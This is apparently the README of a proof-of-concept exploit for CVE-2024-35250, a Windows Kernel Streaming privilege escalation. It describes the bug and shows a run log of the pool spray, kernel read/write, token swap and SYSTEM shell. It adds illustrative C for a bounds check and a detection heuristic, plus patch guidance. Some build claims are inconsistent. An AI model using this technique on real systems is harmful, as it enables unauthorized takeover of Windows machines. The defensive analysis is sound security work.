## https://sploitus.com/exploit?id=1DE5E169-6880-5017-80AB-E62E4EA0A3D9
# CVE-2024-35250

Local privilege escalation via an untrusted pointer dereference in the Windows Kernel Streaming driver (`ks.sys`).
Data-only exploit: it needs no kernel code execution, so Hypervisor-protected Code Integrity (HVCI) does not stop it.

## Summary

| Field | Detail |
|---|---|
| CVE | CVE-2024-35250 |
| Component | ks.sys (Kernel Streaming) |
| Bug Class | Untrusted Pointer Dereference |
| Impact | EoP to NT AUTHORITY\SYSTEM |
| HVCI | Bypassed; no code execution in kernel |
| Patch | KB5039212 (June 2024) |
| Targets | Windows 10 20H1+ / Windows 11 21H2-23H2 |

## Vulnerability

`ks!KspPropertyHandler` dispatches topology-level property requests through
`KspProcessPropertyNode`. The `NodeId` field of the user-supplied `KSP_NODE`
structure is used as an index into an internal automation-table array
without bounds validation:

```
NtDeviceIoControlFile
  ks!CKSFilter::DispatchDeviceIoControl
    ks!KspPropertyHandler
      ks!KspProcessPropertyNode
        *(automationTable + NodeId * stride)
```

Sample run output:

```
eop
[~] hvci bypass via data-only attack
[+] os: 10.0.19045
[+] offsets: pid=0x440 links=0x448 token=0x4b8
[+] device: \\?\hdaudio#func_01&ven_10ec...
[+] device handle: 0x00000000000000f4
[~] calibrating r/w primitive...
[+] kernel base: 0xfffff80140000000
[~] spraying named pipes for pool layout...
[+] sprayed 5000 pipe pairs
[~] poking hole at index 2500...
[~] scanning for kernel pointer via oob read...
[+] found kernel ptr at node 3 offset 2: 0xffffa70500000000
[+] pipe object kernel addr: 0xffffa70500000000
[+] r/w primitive initialized (mode 1)
[+] current eprocess: 0xffffa705d90f4080
[+] kernel read pid: 1234 (expected: 1234)
[+] system eprocess: 0xffffa70500004080
[+] system token: 0xffffa70512345673
[+] token after swap: 0xffffa70512345670
[+] token swap successful
[+] escalation complete
[+] elevated shell spawned (pid: 5678)

press enter to exit...
```
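The missing check, as an added illustration that is neither `ks.sys` code nor this project's code: a simplified C model of a per-node automation table, with the unchecked offset computation the text describes next to a lookup that validates `NodeId` against the table's element count before forming the pointer. The status values, the entry layout, the handlers and the table contents are all constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Stand-in for NTSTATUS: 0 = success, negative = failure.
 * Constructed for this example; not the kernel's definitions. */
typedef long MY_STATUS;
#define MY_STATUS_SUCCESS            0L
#define MY_STATUS_INVALID_PARAMETER  (-1L)

/* Assumed shape of one automation-table entry for a topology node. */
typedef struct {
    uint32_t node_type;           /* identifies the node kind */
    MY_STATUS (*handler)(void);   /* property handler for this node */
} NODE_AUTOMATION_ENTRY;

/* The table as a driver would hold it: base pointer plus element count.
 * The count is what the vulnerable path never consulted. */
typedef struct {
    const NODE_AUTOMATION_ENTRY *entries;
    size_t count;
} NODE_AUTOMATION_TABLE;

/* Hypothetical handlers standing in for real topology-node handlers. */
static MY_STATUS volume_handler(void) { return MY_STATUS_SUCCESS; }
static MY_STATUS mute_handler(void)   { return MY_STATUS_SUCCESS; }

static const NODE_AUTOMATION_ENTRY sample_entries[] = {
    { 1, volume_handler },
    { 2, mute_handler },
};
static const NODE_AUTOMATION_TABLE sample_table = { sample_entries, 2 };

/* Vulnerable pattern: the user-controlled index goes straight into the
 * pointer arithmetic, so any NodeId >= count lands past the table.
 * Only the offset is computed here; nothing is dereferenced. */
size_t unchecked_node_offset(uint32_t node_id) {
    return (size_t)node_id * sizeof(NODE_AUTOMATION_ENTRY);
}

/* Hardened lookup: reject a NodeId outside [0, count) before the pointer
 * is formed. Sets *out and returns success on a valid index. */
MY_STATUS lookup_node_checked(const NODE_AUTOMATION_TABLE *table,
                              uint32_t node_id,
                              const NODE_AUTOMATION_ENTRY **out) {
    *out = NULL;
    if (table == NULL || table->entries == NULL)
        return MY_STATUS_INVALID_PARAMETER;
    /* Widen to size_t so the comparison cannot be fooled by a large index. */
    if ((size_t)node_id >= table->count)
        return MY_STATUS_INVALID_PARAMETER;
    *out = &table->entries[node_id];
    return MY_STATUS_SUCCESS;
}

/* Dispatch a topology property request for node_id via the checked lookup. */
MY_STATUS dispatch_node_property(const NODE_AUTOMATION_TABLE *table, uint32_t node_id) {
    const NODE_AUTOMATION_ENTRY *entry;
    MY_STATUS st = lookup_node_checked(table, node_id, &entry);
    if (st != MY_STATUS_SUCCESS)
        return st;
    return entry->handler();
}

int main(void) {
    printf("node 1: %ld\n", dispatch_node_property(&sample_table, 1));
    printf("node 0xffffffff: %ld\n", dispatch_node_property(&sample_table, 0xffffffffu));
    return 0;
}
```

Running `main` prints a success status for node 1 and an invalid-parameter status for the out-of-range index. The validation belongs in the driver's dispatch path before any arithmetic on the index; the model only shows the shape of that check and how a caller consumes its result.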

## Project Structure

```
CVE-2024-35250/
├── CVE-2024-35250.sln
├── CVE-2024-35250.vcxproj
├── CVE-2024-35250.vcxproj.filters
├── README.md
├── LICENSE
├── .gitignore
├── include/
│   ├── common.h         - types, log macros, nt api typedefs
│   ├── offsets.h        - per-build eprocess field offsets
│   ├── device.h         - ks device enumeration
│   ├── leak.h           - kernel address leaks
│   ├── krw.h            - r/w primitive context
│   ├── token.h          - token swap + shell spawn
│   └── exploit.h        - top-level entry
└── src/
    ├── main.c           - entry point
    ├── device.c         - setupapi device open
    ├── leak.c           - NtQuerySystemInformation leaks
    ├── krw.c            - vulnerability trigger + pool spray + r/w
    ├── token.c          - eprocess walk + token overwrite
    └── exploit.c        - orchestration
```

## Supported Builds

| OS | Build | Status |
|---|---|---|
| Windows 10 20H1 | 19041 | Supported |
| Windows 10 20H2 | 19042 | Supported |
| Windows 10 21H1 | 19043 | Supported |
| Windows 10 21H2 | 19044 | Supported |
| Windows 10 22H2 | 19045 | Supported |
| Windows 11 21H2 | 22000 | Supported |
| Windows 11 22H2 | 22621 | Supported |
| Windows 11 23H2 | 22631 | Supported |
| Windows 11 24H2 | 26100 | Supported |

Offsets are resolved automatically at runtime via `RtlGetVersion`.

## Notes

- Requires a KS filter device with topology nodes (audio devices work)
- Pool spray success depends on system memory pressure and timing
- The exploit uses named pipe attributes for pool feng shui
- Run as a regular (non-admin) user to demonstrate privilege escalation
- May require multiple attempts due to pool layout randomization

## Mitigation

| Action | Detail |
|---|---|
| **Patch** | Install KB5039212 (June 2024) or later |
| **Detection** | Monitor `IOCTL_KS_PROPERTY` requests carrying the `KSPROPERTY_TYPE_TOPOLOGY` flag |
| **EDR** | Alert on token integrity changes via EtwTi kernel callbacks |
| **Hardening** | Restrict user access to KS device interfaces via DACL |
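For the EDR row, an added detection heuristic that is not part of this project and does not consume EtwTi events: over process-creation records, flag a child whose token belongs to `NT AUTHORITY\SYSTEM` while its parent runs under a different account. Service launches have a SYSTEM parent (`services.exe`, `svchost.exe`) and UAC elevation keeps the same account at a higher integrity level, so this pattern is rare in normal activity and matches the "elevated shell spawned" step of the run log. The record layout and the sample events are constructed; the pids are invented to mirror the log.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed process-creation record, loosely modelled on the fields a
 * process-creation event (Sysmon event 1, for instance) carries.
 * This is not a real log format. */
typedef struct {
    unsigned pid;
    unsigned ppid;
    const char *image;
    const char *user;       /* account the primary token belongs to */
    const char *integrity;  /* Low / Medium / High / System */
} PROC_EVENT;

#define SYSTEM_ACCOUNT "NT AUTHORITY\\SYSTEM"

/* Constructed sample batch: service spawns, a UAC elevation (same account,
 * higher integrity), and a SYSTEM child of a user-mode parent, which is what
 * a token swap followed by a spawned shell looks like. */
static const PROC_EVENT sample_events[] = {
    {  700,    4, "C:\\Windows\\System32\\services.exe", SYSTEM_ACCOUNT,   "System" },
    {  900,  700, "C:\\Windows\\System32\\svchost.exe",  SYSTEM_ACCOUNT,   "System" },
    { 4100, 3000, "C:\\Windows\\explorer.exe",           "DESKTOP\\alice", "Medium" },
    { 4200, 4100, "C:\\Windows\\System32\\cmd.exe",      "DESKTOP\\alice", "Medium" },
    { 4300, 4100, "C:\\Windows\\System32\\mmc.exe",      "DESKTOP\\alice", "High"   },
    { 1234, 4200, "C:\\Users\\alice\\poc.exe",           "DESKTOP\\alice", "Medium" },
    { 5678, 1234, "C:\\Windows\\System32\\cmd.exe",      SYSTEM_ACCOUNT,   "System" },
};
static const size_t sample_count = sizeof(sample_events) / sizeof(sample_events[0]);

/* Find the record for a pid within the batch; NULL if it is not present. */
static const PROC_EVENT *find_by_pid(const PROC_EVENT *ev, size_t n, unsigned pid) {
    for (size_t i = 0; i < n; i++)
        if (ev[i].pid == pid) return &ev[i];
    return NULL;
}

/* Heuristic: a child running as SYSTEM whose parent runs under a different,
 * non-SYSTEM account. An unknown parent yields no alert here; a real
 * pipeline would enrich from its process cache instead of skipping. */
bool is_suspicious_elevation(const PROC_EVENT *child, const PROC_EVENT *parent) {
    if (child == NULL || parent == NULL) return false;
    if (strcmp(child->user, SYSTEM_ACCOUNT) != 0) return false;
    return strcmp(parent->user, SYSTEM_ACCOUNT) != 0;
}

/* Scan a batch; returns the alert count and stores up to max child pids. */
size_t scan_events(const PROC_EVENT *ev, size_t n, unsigned *out, size_t max) {
    size_t hits = 0;
    for (size_t i = 0; i < n; i++) {
        const PROC_EVENT *parent = find_by_pid(ev, n, ev[i].ppid);
        if (is_suspicious_elevation(&ev[i], parent)) {
            if (hits < max) out[hits] = ev[i].pid;
            hits++;
        }
    }
    return hits;
}

/* Convenience wrappers over the constructed batch. */
size_t sample_alert_count(void) {
    unsigned pids[8];
    return scan_events(sample_events, sample_count, pids, 8);
}
unsigned sample_first_alert_pid(void) {
    unsigned pids[8];
    return scan_events(sample_events, sample_count, pids, 8) > 0 ? pids[0] : 0;
}

int main(void) {
    unsigned pids[8];
    size_t n = scan_events(sample_events, sample_count, pids, 8);
    for (size_t i = 0; i < n && i < 8; i++) {
        const PROC_EVENT *c = find_by_pid(sample_events, sample_count, pids[i]);
        printf("ALERT pid %u (%s) runs as %s under non-SYSTEM parent %u\n",
               c->pid, c->image, c->user, c->ppid);
    }
    return 0;
}
```

On the constructed batch only the shell spawned by the user-mode parent is reported; the service chain and the UAC elevation pass. In production the parent lookup must come from a process cache rather than the current batch, and the rule should be paired with the `IOCTL_KS_PROPERTY` telemetry from the Detection row so the alert carries the triggering device request.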

## References

- [Microsoft Advisory](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-35250)
- [KB5039212 Patch Notes](https://support.microsoft.com/help/5039212)
- [DEVCORE (Pwn2Own Vancouver 2024)](https://devco.re/)
- [varwara/CVE-2024-35250](https://github.com/varwara/CVE-2024-35250)

## Disclaimer

This project is provided for authorized security research and educational
purposes only. Do not use against systems without explicit written permission.
The author assumes no liability for any misuse or damage caused by this software.

## License

[MIT](LICENSE)